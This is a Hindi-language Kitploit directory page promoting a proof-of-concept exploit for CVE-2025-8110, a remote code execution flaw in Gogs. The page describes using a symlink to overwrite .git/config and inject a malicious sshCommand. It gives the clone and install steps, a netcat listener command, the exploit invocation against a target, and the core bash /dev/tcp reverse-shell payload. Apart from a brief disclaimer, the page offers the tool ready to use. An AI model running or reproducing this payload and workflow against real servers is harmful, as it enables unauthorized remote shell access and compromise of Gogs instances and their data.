Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8110 — CVE-2025-8110 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो सिम्बोलिक लिंक्स के माध्यम से पाथ ट्रैवर्सल और sshCommand इंजेक्शन का शोषण करके रिवर्स शेल पहुंचाने वाली Gogs RCE भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/ghxstsec/cve-2025-8110
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

CVE-2025-8110 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो सिम्बोलिक लिंक्स के माध्यम से पाथ ट्रैवर्सल और sshCommand इंजेक्शन का शोषण करके रिवर्स शेल पहुंचाने वाली Gogs RCE भेद्यता है।

रिपॉजिटरी देखें
534 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Gogs RCE एक्सप्लॉइट (CVE-2025-8110)

Python License Expertise

CVE-2025-8110 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC), जो Gogs में एक गंभीर कमजोरी है जो सिम्बोलिक लिंक बाईपास और sshCommand इंजेक्शन के माध्यम से .git/config हेरफेर द्वारा रिमोट कोड एग्ज़ीक्यूशन (RCE) की अनुमति देती है।

📖 अवलोकन

यह एक्सप्लॉइट Gogs API सामग्री प्रबंधन में एक पाथ ट्रैवर्सल दोष को लक्षित करता है। एक प्रमाणित उपयोगकर्ता यह कर सकता है:

  1. एक रिपॉजिटरी बनाएं और आंतरिक .git/config की ओर इशारा करने वाला एक सिम्बोलिक लिंक पुश करें।
  2. सिम्लिंक के माध्यम से लक्षित कॉन्फ़िग फ़ाइल को ओवरराइट करने के लिए API का उपयोग करें।
  3. सर्वर गिट ऑपरेशन करते समय रिवर्स शेल निष्पादित करने के लिए एक दुर्भावनापूर्ण sshCommand इंजेक्ट करें।

🚀 विशेषताएँ

  • स्वचालित वर्कफ़्लो: लॉगिन, रिपोजिटरी निर्माण, सिम्लिंक परिनियोजन और पॉइज़निंग को संभालता है।
  • मजबूत एन्कोडिंग: विशेष वर्णों (जैसे !, @) को संभालने के लिए क्रेडेंशियल्स को स्वचालित रूप से URL-एन्कोड करता है।
  • समृद्ध आउटपुट: Rich लाइब्रेरी का उपयोग करके उच्च-दृश्यता लॉगिंग।

🛠 आवश्यक शर्तें

  • Python 3.12+
  • Git स्थानीय सिस्टम पर स्थापित है।
  • लक्षित Gogs इंस्टेंस पर मान्य क्रेडेंशियल्स।

📦 इंस्टॉलेशन

  1. रिपॉजिटरी क्लोन करें:
    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    

निर्भरताएँ इंस्टॉल करें:

root@kitploit:~
pip3 install -r requirements.txt

💻 उपयोग

अपना लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 6666

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

तर्क:

कमजोरी का मूल:

sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

जब Gogs कोई ऐसा Git कमांड निष्पादित करता है जिसके लिए नेटवर्क ट्रांसपोर्ट की आवश्यकता होती है (जैसे मिरर सिंक या आंतरिक संदर्भ जांच), तो यह sshCommand को लागू करता है, जिससे रिवर्स शेल ट्रिगर होता है।

⚠️ कानूनी अस्वीकरण: यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।

टूल डाउनलोड करें
तर्कविवरण
-u, --urlलक्ष्य Gogs इंस्टेंस का बेस URL (जैसे, http://target.htb:3000)।
-lh, --hostहमलावर का IP (LHOST) जहाँ रिवर्स शेल वापस कनेक्ट होगा।
-lp, --portआपकी मशीन पर कॉन्फ़िगर किया गया लिसनर पोर्ट (LPORT)।
-p, --passwordप्रमाणीकरण करने के लिए pwnuser खाते का पासवर्ड।
-x, --proxy(वैकल्पिक) ट्रैफ़िक को स्थानीय प्रॉक्सी के माध्यम से रूट करता है (डिफ़ॉल्ट: http://localhost:8080)।